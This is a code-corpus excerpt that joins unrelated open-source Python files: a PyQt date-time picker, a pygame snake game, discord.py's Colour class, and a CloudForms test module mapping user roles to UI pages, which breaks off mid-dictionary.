self.ui.pmbutton.toggled.connect(self.isDirty)
self.ui.datepicker.selectionChanged.connect(self.isDirty)
self.ui.hourpicker.itemSelectionChanged.connect(self.isDirty)
self.ui.minutepicker.itemSelectionChanged.connect(self.isDirty)
self.ui.buttonBox.accepted.connect(self.accept)
self.ui.buttonBox.rejected.connect(self.reject)
self.ui.setasnowbutton.pressed.connect(self.setAsNow)
self.setWindowFlags(Qt.Dialog | Qt.CustomizeWindowHint)
if mode == "Date":
self.ui.timesection.hide()
self.ui.setasnowbutton.setText("Set as current date")
elif mode == "Time":
self.ui.datepicker.hide()
self.ui.setasnowbutton.setText("Set as current time")
def isDirty(self, *args):
date = self.getSelectedDate()
time = self.getSelectedTime()
datetime = QDateTime(date, time)
if self.mode == "Date":
value = datetime.toString("ddd d MMM yyyy")
elif self.mode == "Time":
value = datetime.toString("h:m ap")
else:
value = datetime.toString("ddd d MMM yyyy 'at' h:m ap")
self.ui.label.setText(value)
def setDateTime(self, datetime):
"""
Set the picker to datatime
datetime - The QDateTime with the value to set.
"""
self.setTime(datetime.time())
self.setDate(datetime.date())
def setAsNow(self):
"""
Set the current date and time on the picker as now.
"""
now = QDateTime.currentDateTime()
self.setDateTime(now)
def setTime(self, time):
"""
Set just the time part of the picker
"""
hour = time.hour()
if hour > 12:
hour = hour - 12
if hour == 0:
hour = hour + 12
minute = time.minute()
minute = int(round(minute / 5.0) * 5.0)
amap = time.toString("AP")
log("Hour %s Minute %s" % (hour, minute))
try:
houritems = self.ui.hourpicker.findItems(str(hour), Qt.MatchFixedString)
self.ui.hourpicker.setCurrentItem(houritems[0])
except IndexError:
log("Can't find hour")
try:
minuteitems = self.ui.minutepicker.findItems(str(minute), Qt.MatchFixedString)
self.ui.minutepicker.setCurrentItem(minuteitems[0])
except IndexError:
log("Can't find minute")
if amap == "PM":
self.ui.pmbutton.toggle()
def setDate(self, date):
"""
Set just the date part of the picker
"""
self.ui.datepicker.setSelectedDate(date)
def getSelectedTime(self):
"""
Returns the currently selected data and time
"""
try:
hour = self.ui.hourpicker.currentItem().text()
except AttributeError:
hour = ""
try:
minute = self.ui.minutepicker.currentItem().text()
except AttributeError:
minute = ""
zone = self.ui.ambutton.isChecked() and "AM" or "PM"
return QTime.fromString("%s%s%s" % (hour, minute, zone), "hmAP")
def getSelectedDate(self):
"""
Returns just the date part of the picker
"""
return self.ui.datepicker.selectedDate()
if __name__ == "__main__":
app = QApplication([])
dlg = DateTimePickerDialog()
dlg.show()
app.exec_() | gpl-2.0 | 8,286,299,197,854,796,000 | 30.589552 | 90 | 0.587902 | false | 3.850773 | false | false | false |
alej0varas/gibbles | gibbles/__main__.py | 1 | 7759 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# nibbles like game. much more fun, moves on all directions and jump, can be played with mouse.
from math import cos, radians, sin
from random import choice
import os
import sys
import pygame
from pygame.locals import *
from pygame.colordict import THECOLORS
import data
EGG_RATIO = 5
MAX_EGGS = 2
SNAKE_WIDTH = 4
SNAKE_INITIAL_LENGTH = 10
SNAKE_INITIAL_HEADING = 90
SNAKE_INITIAL_SPEED = 10
SNAKE_INITIAL_POSITION = (200,200)
SNAKE_COLOR = THECOLORS['green']
INITIAL_GAME_SPEED = 5
WIDTH = 400
HEIGHT = 400
RESOLUTION = (WIDTH, HEIGHT)
class SnakeBodyPart(pygame.sprite.Sprite):
"""Snake body part."""
def __init__(self, image, position, in_body_position):
pygame.sprite.Sprite.__init__(self)
self.image = image
self.rect = self.image.get_rect()
self.rect.topleft = position
self.in_body_position = in_body_position
class Snake:
"""Player"""
spacing = 5
head_img = pygame.image.load(data.load(os.path.join('images', 'head.png')))
tail_img = pygame.image.load(data.load(os.path.join('images', 'tail.png')))
body_img = pygame.image.load(data.load(os.path.join('images', 'body.png')))
def __init__(self, start, sections, heading, speed, color):
self.body = [start]
self.body.extend(
[
(
start[0] + sin(radians(360 - heading)) * self.spacing * i,
start[1] + cos(radians(360 - heading)) * self.spacing * i
) for i in range(sections)
]
)
self.sections = sections
self.heading = heading
self.speed = speed
self.color = color
self.older = False
self.alive = True
self.rects = []
self.in_air = 0
self.bodyparts = pygame.sprite.OrderedUpdates()
self.create_bodyparts()
@property
def head(self):
return self.bodyparts.sprites()[0].rect
@property
def head_point(self):
"""Return the closest to heading point of head's rect"""
if 45 < self.heading < 135:
return self.head.midright
elif 135 < self.heading < 225:
return self.head.midbottom
elif 225 < self.heading < 315:
return self.head.midleft
else:
return self.head.midtop
def advance(self):
head = self.body[0]
if self.older:
self.older -= 1
tail = self.body[:]
else:
tail = self.body[:-1]
xinc = sin(radians(self.heading)) * self.spacing
yinc = cos(radians(self.heading)) * self.spacing
head = (head[0] + xinc, head[1] + yinc)
# check if run into snakes own body and die
# why the split?, don't consider the beginning of the body, this make the snake die when turning
for part in self.bodyparts.sprites()[10:]:
if not self.in_air:
if part.rect.colliderect(self.head):
self.die()
# fell down from jump
if self.in_air:
self.in_air -= 1
body = []
body.append(head)
body.extend(tail)
self.body = body
self.create_bodyparts()
# put sprites in place
for i in range(len(tail)):
self.bodyparts.sprites()[i].rect.topleft = self.body[i]
def create_bodyparts(self):
self.bodyparts.empty()
# first head
self.bodyparts.add(SnakeBodyPart(self.head_img, self.body[0], 0))
# then body
# minus head and tail
for i in range(1, len(self.body) - 2):
self.bodyparts.add(SnakeBodyPart(self.body_img, self.body[i], i))
# finally tail
self.bodyparts.add(SnakeBodyPart(self.tail_img, self.body[-1], len(self.body)))
def die(self):
self.alive = False
def grow_up(self, sections=1):
self.older += sections
def jump(self):
if not self.in_air:
self.in_air += 10
class Egg(pygame.sprite.Sprite):
"""Eggs the player collect"""
def __init__(self, position, image):
pygame.sprite.Sprite.__init__(self)
self.image = image
self.rect = self.image.get_rect()
self.rect.topleft = position
self.position = position
self.eaten = False
self.drawed = False
def die(self):
self.drawed = False # Get redrawed
self.eaten = True
class Main:
def __init__(self):
self.window = pygame.display.set_mode(RESOLUTION)
self.background = pygame.Surface(RESOLUTION)
self.background.fill(THECOLORS['white'])
self.screen = pygame.display.get_surface()
self.screen.fill(THECOLORS['white'])
self.s = Snake(SNAKE_INITIAL_POSITION, SNAKE_INITIAL_LENGTH , SNAKE_INITIAL_HEADING, SNAKE_INITIAL_SPEED, SNAKE_COLOR)
self.s.bodyparts.clear(self.screen, self.background)
self.s.bodyparts.draw(self.screen)
self.pos = (0,0)
self.eggs = pygame.sprite.Group()
self.clock = pygame.time.Clock()
self.game_speed = INITIAL_GAME_SPEED
# TODO: Loader for eggs images
self.egg_image = pygame.image.load('data/images/egg%s.png' % choice([0]))
self.egg_size = self.egg_image.get_width(), self.egg_image.get_height()
self.dead_egg = pygame.Surface(self.egg_size)
self.dead_egg.fill(THECOLORS['white'])
def run(self):
while self.s.alive:
# add eggs
while len(self.eggs) < MAX_EGGS:
invalid = True
# Get egg position
while invalid:
position = choice(range(self.egg_size[0], WIDTH - self.egg_size[0])), choice(range(self.egg_size[1], HEIGHT - self.egg_size[1]))
rect = pygame.Rect(position, self.egg_size)
# check against eggs
invalid = any([egg.rect.colliderect(rect) for egg in self.eggs])
# check against snake
if not invalid:
invalid = any([bp.rect.colliderect(rect) for bp in self.s.bodyparts.sprites()])
self.eggs.add(Egg(position, self.egg_image))
# eat eggs.
for egg in self.eggs.sprites():
if egg.rect.colliderect(self.s.head):
egg.die()
self.s.grow_up(5)
self.game_speed += 1
if not egg.drawed:
self.screen.blit(egg.image, egg.rect)
egg.drawed = True
if egg.eaten:
self.screen.blit(self.dead_egg, egg.rect)
self.eggs.remove(egg)
self.input(pygame.event.get())
self.s.bodyparts.clear(self.screen, self.background)
self.s.bodyparts.draw(self.screen)
pygame.display.flip()
self.s.advance()
# fall out of screen
if not self.screen.get_rect().collidepoint(self.s.head_point):
self.s.die()
self.clock.tick(self.game_speed)
def input(self, events):
for event in events:
if event.type == QUIT:
sys.exit(0)
elif event.type == MOUSEMOTION:
if event.pos[0] < self.pos[0]:
self.s.heading += 1
else:
self.s.heading -= 1
self.pos = event.pos
elif event.type in (KEYUP, KEYDOWN):
if event.key == K_SPACE:
self.s.jump()
elif event.key == K_ESCAPE:
sys.exit(0)
def main():
pygame.init()
game = Main()
game.run()
| gpl-3.0 | 6,522,315,543,549,074,000 | 30.669388 | 148 | 0.553551 | false | 3.694762 | false | false | false |
potatosushi/Discord-Notification-Bot | discord/colour.py | 2 | 6599 | # -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-2016 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
class Colour:
"""Represents a Discord role colour. This class is similar
to an (red, green, blue) tuple.
There is an alias for this called Color.
Supported operations:
+-----------+----------------------------------------+
| Operation | Description |
+===========+========================================+
| x == y | Checks if two colours are equal. |
+-----------+----------------------------------------+
| x != y | Checks if two colours are not equal. |
+-----------+----------------------------------------+
| hash(x) | Return the colour's hash. |
+-----------+----------------------------------------+
| str(x) | Returns the hex format for the colour. |
+-----------+----------------------------------------+
Attributes
------------
value : int
The raw integer colour value.
"""
__slots__ = [ 'value' ]
def __init__(self, value):
self.value = value
def _get_byte(self, byte):
return (self.value >> (8 * byte)) & 0xff
def __eq__(self, other):
return isinstance(other, Colour) and self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return '#{:0>6x}'.format(self.value)
def __hash__(self):
return hash(self.value)
@property
def r(self):
"""Returns the red component of the colour."""
return self._get_byte(2)
@property
def g(self):
"""Returns the green component of the colour."""
return self._get_byte(1)
@property
def b(self):
"""Returns the blue component of the colour."""
return self._get_byte(0)
def to_tuple(self):
"""Returns an (r, g, b) tuple representing the colour."""
return (self.r, self.g, self.b)
@classmethod
def default(cls):
"""A factory method that returns a :class:`Colour` with a value of 0."""
return cls(0)
@classmethod
def teal(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x1abc9c``."""
return cls(0x1abc9c)
@classmethod
def dark_teal(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x11806a``."""
return cls(0x11806a)
@classmethod
def green(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x2ecc71``."""
return cls(0x2ecc71)
@classmethod
def dark_green(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x1f8b4c``."""
return cls(0x1f8b4c)
@classmethod
def blue(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x3498db``."""
return cls(0x3498db)
@classmethod
def dark_blue(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x206694``."""
return cls(0x206694)
@classmethod
def purple(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x9b59b6``."""
return cls(0x9b59b6)
@classmethod
def dark_purple(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x71368a``."""
return cls(0x71368a)
@classmethod
def magenta(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xe91e63``."""
return cls(0xe91e63)
@classmethod
def dark_magenta(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xad1457``."""
return cls(0xad1457)
@classmethod
def gold(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xf1c40f``."""
return cls(0xf1c40f)
@classmethod
def dark_gold(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xc27c0e``."""
return cls(0xc27c0e)
@classmethod
def orange(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xe67e22``."""
return cls(0xe67e22)
@classmethod
def dark_orange(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xa84300``."""
return cls(0xa84300)
@classmethod
def red(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xe74c3c``."""
return cls(0xe74c3c)
@classmethod
def dark_red(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x992d22``."""
return cls(0x992d22)
@classmethod
def lighter_grey(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x95a5a6``."""
return cls(0x95a5a6)
@classmethod
def dark_grey(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x607d8b``."""
return cls(0x607d8b)
@classmethod
def light_grey(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x979c9f``."""
return cls(0x979c9f)
@classmethod
def darker_grey(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x546e7a``."""
return cls(0x546e7a)
Color = Colour
| mit | -4,478,125,788,136,537,600 | 31.328283 | 91 | 0.571147 | false | 3.942055 | false | false | false |
lkhomenk/integration_tests | cfme/roles.py | 2 | 22851 | from cfme.utils.log import logger
def _remove_page(roles, group, pages):
if group in roles:
for page in pages:
if page in roles[group]:
roles[group].remove(page)
else:
logger.info("Page %s attempted to be removed from role %s, "
"but isn't in there anyway", page, group)
else:
logger.info("Attempted to remove a page from role %s, but role "
"doesn't exist", group)
def _remove_from_all(roles, r_page):
for group in roles:
for page in roles[group]:
if page == r_page:
roles[group].remove(page)
else:
logger.info("Page %s attempted to be removed from role %s, "
"but isn't in there anyway", page, group)
group_data = {
'evmgroup-administrator': [
'control_explorer',
'control_simulation',
'control_import_export',
'control_log',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'infrastructure_pxe',
'infrastructure_requests',
'clouds_providers',
'clouds_availability_zones',
'clouds_flavors',
'clouds_security_groups',
'clouds_instances',
'clouds_stacks',
'my_settings',
'tasks',
'about',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'automate_explorer',
'automate_simulation',
'automate_customization',
'automate_import_export',
'automate_log',
'automate_requests',
'my_services',
'services_catalogs',
'services_requests',
'services_workloads',
'utilization',
'planning',
'bottlenecks'
],
'evmgroup-approver': [
'control_explorer',
'control_simulation',
'control_log',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'infrastructure_pxe',
'infrastructure_requests',
'clouds_instances',
'my_settings',
'tasks',
'about',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'services_requ,ests'
'services_workloads'
],
'evmgroup-auditor': [
'control_explorer',
'control_simulation',
'control_log',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'infrastructure_pxe',
'clouds_instances',
'my_settings',
'tasks',
'about',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'services_workloads',
'utilization',
'planning',
'bottlenecks'
],
'evmgroup-desktop': [
'services_requests',
'services_workloads',
'dashboard',
'infrastructure_config_management',
'infrastructure_requests',
'infrastructure_virtual_machines',
'clouds_instances',
'my_settings',
'about'
],
'evmgroup-operator': [
'services_workloads',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'infrastructure_pxe',
'clouds_instances',
'my_settings',
'tasks',
'about'
],
'evmgroup-security': [
'control_explorer',
'control_simulation',
'control_log',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'clouds_instances',
'my_settings',
'tasks',
'about',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'services_workloads'
],
'evmgroup-super_administrator': [
'control_explorer',
'control_simulation',
'control_import_export',
'control_log',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'infrastructure_pxe',
'infrastructure_requests',
'infrastructure_config_management',
'clouds_providers',
'clouds_availability_zones',
'clouds_flavors',
'clouds_security_groups',
'clouds_instances',
'clouds_tenants',
'clouds_stacks',
'my_settings',
'tasks',
'configuration',
'about',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'automate_explorer',
'automate_simulation',
'automate_customization',
'automate_import_export',
'automate_log',
'automate_requests',
'my_services',
'services_catalogs',
'services_requests',
'services_workloads',
'utilization',
'planning',
'bottlenecks'
],
'evmgroup-support': [
'control_explorer',
'control_simulation',
'control_log',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'clouds_instances',
'my_settings',
'tasks',
'about',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'services_workloads'
],
'evmgroup-user': [
'services_workloads',
'services_requests',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'infrastructure_requests',
'clouds_instances',
'my_settings',
'tasks',
'about'
],
'evmgroup-user_limited_self_service': [
'clouds_instances',
'services_requests',
'infrastructure_virtual_machines',
'infrastructure_requests',
'my_settings',
'about'
],
'evmgroup-user_self_service': [
'clouds_instances',
'services_requests',
'infrastructure_config_management',
'infrastructure_virtual_machines',
'infrastructure_requests',
'my_settings',
'about'
],
'evmgroup-vm_user': [
'clouds_instances',
'infrastructure_config_management',
'infrastructure_virtual_machines',
'infrastructure_requests',
'services_requests',
'services_workloads',
'my_settings',
'about'
]
}
# Matches structure/string format of VerticalNavigation output for tree, not UI access control tree
# TODO include non-vertical nav RBAC to settings, help
# TODO RBAC goes deeper than veritcal nav, into accordions. example cloud intel -> Reports
role_access_ui_59z = {
'evmgroup-super_administrator': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Jobs', 'Explorer'],
'Automate': ['Log', 'Generic Objects', 'Simulation', 'Import / Export', 'Customization',
'Requests', 'Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Flavors', 'Instances', 'Providers', 'Host Aggregates', 'Availability Zones',
'Key Pairs', 'Tenants', 'Stacks', 'Topology'],
'Containers': ['Container Nodes', 'Containers', 'Providers', 'Overview',
'Container Templates', 'Image Registries', 'Container Builds',
'Container Services', 'Volumes', 'Container Images', 'Routes', 'Pods',
'Replicators', 'Projects', 'Topology'],
'Infrastructure': ['Datastores', 'Networking', 'Providers', 'Virtual Machines', 'Hosts',
'Clusters', 'Topology', 'PXE', 'Resource Pools'],
'Physical Infrastructure': ['Topology', 'Servers', 'Providers']},
'Configuration': ['Management'],
'Control': ['Import / Export', 'Log', 'Explorer', 'Simulation'],
'Monitor': {
'Alerts': ['Overview', 'All Alerts']},
'Networks': ['Subnets', 'Load Balancers', 'Providers', 'Security Groups', 'Floating IPs',
'Network Ports', 'Topology', 'Networks', 'Network Routers'],
'Optimize': ['Bottlenecks', 'Planning', 'Utilization'],
'Red Hat Insights': ['Rules', 'Overview', 'Inventory', 'Actions'],
'Services': ['Requests', 'Workloads', 'Catalogs', 'My Services'],
'Storage': {
'Block Storage': ['Volume Snapshots', 'Managers', 'Volume Backups', 'Volumes'],
'Object Storage': ['Managers', 'Object Store Containers', 'Object Store Objects']}
},
'evmgroup-administrator': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Jobs', 'Explorer'],
'Automate': ['Log', 'Simulation', 'Import / Export', 'Customization',
'Requests', 'Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Flavors', 'Instances', 'Providers', 'Host Aggregates', 'Availability Zones',
'Stacks', 'Topology'],
'Containers': ['Container Nodes', 'Containers', 'Providers', 'Overview',
'Image Registries', 'Container Builds', 'Container Services',
'Volumes', 'Container Images', 'Routes', 'Pods', 'Replicators',
'Projects', 'Topology'],
'Infrastructure': ['Datastores', 'Networking', 'Providers', 'Virtual Machines', 'Hosts',
'Clusters', 'Topology', 'PXE', 'Resource Pools'],
'Physical Infrastructure': ['Providers']},
'Configuration': ['Management'],
'Control': ['Import / Export', 'Log', 'Explorer', 'Simulation'],
'Networks': ['Providers', 'Security Groups', 'Floating IPs', 'Networks'],
'Optimize': ['Bottlenecks', 'Planning', 'Utilization'],
'Services': ['Requests', 'Workloads', 'Catalogs', 'My Services'],
'Storage': {
'Object Storage': ['Object Store Containers', 'Object Store Objects']}
},
'evmgroup-approver': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'PXE', 'Resource Pools'],
'Physical Infrastructure': ['Servers', 'Providers']},
'Control': ['Explorer', 'Log', 'Simulation'],
'Services': ['Requests', 'Workloads', 'My Services'],
},
'evmgroup-auditor': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'PXE', 'Resource Pools'],
'Physical Infrastructure': ['Servers', 'Providers']},
'Control': ['Explorer', 'Log', 'Simulation'],
'Optimize': ['Bottlenecks', 'Planning', 'Utilization'],
'Services': ['Workloads', 'My Services']},
'evmgroup-desktop': {
'Automation': {
'Ansible Tower': ['Explorer']},
'Cloud Intel': ['Dashboard'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Virtual Machines']},
'Configuration': ['Management'],
'Services': ['Requests', 'Workloads']
},
'evmgroup-operator': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'PXE', 'Resource Pools'],
'Physical Infrastructure': ['Servers', 'Providers']},
'Configuration': ['Management'],
'Services': ['Workloads', 'My Services']
},
'evmgroup-security': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts',
'Clusters', 'Resource Pools'],
'Physical Infrastructure': ['Servers', 'Providers']},
'Control': ['Explorer', 'Log', 'Simulation'],
'Services': ['My Services', 'Workloads']
},
'evmgroup-support': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'Resource Pools'],
'Physical Infrastructure': ['Servers', 'Providers']},
'Control': ['Explorer', 'Log', 'Simulation'],
'Services': ['My Services', 'Workloads']
},
'evmgroup-user': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'Resource Pools'],
'Physical Infrastructure': ['Servers', 'Providers']},
'Services': ['Requests', 'Workloads', 'My Services']
},
'evmgroup-vm_user': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Virtual Machines']},
'Configuration': ['Management'],
'Services': ['Requests', 'Workloads'],
}
}
role_access_ui_58z = {
'evmgroup-super_administrator': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Jobs', 'Explorer'],
'Automate': ['Log', 'Simulation', 'Import / Export', 'Customization', 'Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Flavors', 'Instances', 'Providers', 'Host Aggregates', 'Availability Zones',
'Key Pairs', 'Tenants', 'Stacks', 'Topology'],
'Containers': ['Container Nodes', 'Containers', 'Providers', 'Overview',
'Container Templates', 'Image Registries', 'Container Builds',
'Container Services', 'Volumes', 'Container Images', 'Routes', 'Pods',
'Replicators', 'Projects', 'Topology'],
'Infrastructure': ['Datastores', 'Networking', 'Providers', 'Virtual Machines', 'Hosts',
'Clusters', 'Topology', 'PXE', 'Resource Pools']},
'Configuration': ['Management'],
'Control': ['Import / Export', 'Log', 'Explorer', 'Simulation'],
'Networks': ['Subnets', 'Load Balancers', 'Providers', 'Security Groups', 'Floating IPs',
'Network Ports', 'Topology', 'Networks', 'Network Routers'],
'Optimize': ['Bottlenecks', 'Planning', 'Utilization'],
'Red Hat Insights': ['Rules', 'Overview', 'Systems'],
'Services': ['Requests', 'Workloads', 'Catalogs', 'My Services'],
'Storage': {
'Block Storage': ['Volume Snapshots', 'Managers', 'Volume Backups', 'Volumes'],
'Object Storage': ['Managers', 'Object Store Containers', 'Object Store Objects']}
},
'evmgroup-administrator': {
'Automation': {
'Ansible Tower': ['Jobs', 'Explorer'],
'Automate': ['Log', 'Simulation', 'Import / Export', 'Customization', 'Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Flavors', 'Instances', 'Providers', 'Host Aggregates', 'Availability Zones',
'Stacks', 'Topology'],
'Containers': ['Container Nodes', 'Containers', 'Providers', 'Overview',
'Image Registries', 'Container Builds', 'Container Services',
'Volumes', 'Container Images', 'Routes', 'Pods', 'Replicators',
'Projects', 'Topology'],
'Infrastructure': ['Datastores', 'Networking', 'Providers', 'Virtual Machines', 'Hosts',
'Clusters', 'Topology', 'PXE', 'Resource Pools']},
'Configuration': ['Management'],
'Control': ['Import / Export', 'Log', 'Explorer', 'Simulation'],
'Networks': ['Providers', 'Security Groups', 'Floating IPs', 'Networks'],
'Optimize': ['Bottlenecks', 'Planning', 'Utilization'],
'Services': ['Requests', 'Workloads', 'Catalogs', 'My Services'],
'Storage': {
'Object Storage': ['Object Store Containers', 'Object Store Objects']}
},
'evmgroup-approver': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'PXE', 'Resource Pools']},
'Control': ['Log', 'Simulation'],
'Services': ['Requests', 'Workloads'],
},
'evmgroup-auditor': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'PXE', 'Resource Pools']},
'Control': ['Log', 'Simulation'],
'Optimize': ['Bottlenecks', 'Planning', 'Utilization'],
'Services': ['Workloads']},
'evmgroup-desktop': {
'Automation': {
'Ansible Tower': ['Explorer']},
'Cloud Intel': ['Dashboard'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Virtual Machines']},
'Configuration': ['Management'],
'Services': ['Requests', 'Workloads']
},
'evmgroup-operator': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'PXE', 'Resource Pools']},
'Configuration': ['Management'],
'Services': ['Workloads']
},
'evmgroup-security': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts',
'Clusters', 'Resource Pools']},
'Control': ['Log', 'Simulation'],
'Services': ['Workloads']
},
'evmgroup-support': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'Resource Pools']},
'Control': ['Log', 'Simulation'],
'Services': ['Workloads']
},
'evmgroup-user': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'Resource Pools']},
'Services': ['Requests', 'Workloads']
},
'evmgroup-vm_user': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Virtual Machines']},
